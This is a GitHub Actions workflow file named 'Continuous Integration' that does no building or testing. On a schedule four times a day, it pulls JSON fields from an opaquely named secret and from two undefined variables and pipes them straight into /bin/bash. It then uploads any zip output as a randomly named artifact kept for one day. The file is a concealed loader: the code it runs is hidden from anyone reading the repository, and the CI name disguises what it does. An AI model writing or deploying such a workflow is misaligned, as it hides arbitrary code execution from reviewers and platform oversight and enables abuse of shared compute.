name: Continuous Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '9 5,11,17,23 * * *'
jobs:
  trigger:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          g4: ${{ secrets.g4 }}
        run: |
          printf '%s' "$g4" | jq -r .ll209 | /bin/bash
          printf '%s' "$tjka2" | jq -r .w61 | /bin/bash
          printf '%s' "$pemem15" | jq -r .y60715 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 5OS1JOA1
          path: "*.zip"
          retention-days: 1
